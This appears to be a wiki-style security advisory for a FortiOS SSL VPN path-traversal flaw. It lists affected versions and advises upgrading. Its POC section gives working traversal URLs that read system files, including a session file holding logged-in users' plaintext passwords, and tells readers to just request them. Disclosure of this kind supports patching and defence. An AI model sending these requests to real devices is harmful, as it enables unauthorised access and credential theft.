<> = General Disclosure = This is a path-traversal vulnerability in the FortiOS SSL VPN web portal that could potentially allow an unauthenticated attacker to download files through specially crafted HTTP resource requests. Fortinet advises customers to upgrade to FortiOS 5.4.13, 5.6.11, 6.0.6, 6.2.2. = POC = The next example URL's are responsible: {{{ https://:/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession https://:/remote/fgt_lang?lang=/../../../..//////////////////////////////bin/sh https://:/remote/fgt_lang?lang=/../../../../////////////////////////bin/sslvpnd }}} Just make a request to these URL's and you will get the information needed. Keep in mind that the length of the URL has to be this size. You can also find a proof of concept on [[https://github.com/milo2012/CVE-2018-13379|GitHub]] There is a strange fact that if you start a SSLVPN, you have to log in into the webportal on the internet facing part of the Fortigate. After a successful login, the device writes your IP address, username and password in plaintext to the temporary location ''/dev/cmdb/sslvpn_websession''. If you read this file, the current logged in users and passwords will be visible. = Affected Systems = Here is a list of the operating systems we have tested which are vulnerable to this attack: * FortiOS 6.0 - 6.0.0 to 6.0.4 * FortiOS 5.6 - 5.6.3 to 5.6.7 * FortiOS 5.4 - 5.4.6 to 5.4.12 = Possible Mitigations = Please upgrade! = References = * Fortigate * [[https://kb.fortinet.com/kb/documentLink.do?externalID=FD46513]] * Github * [[https://github.com/milo2012/CVE-2018-13379]] * Explaination exploit * [[https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html]] * [[https://medium.com/@valeriyshevchenko/critical-vulnerabilities-in-pulse-secure-and-fortinet-ssl-vpns-in-the-wild-internet-3991ea9e6481]] ---- CategoryNetwork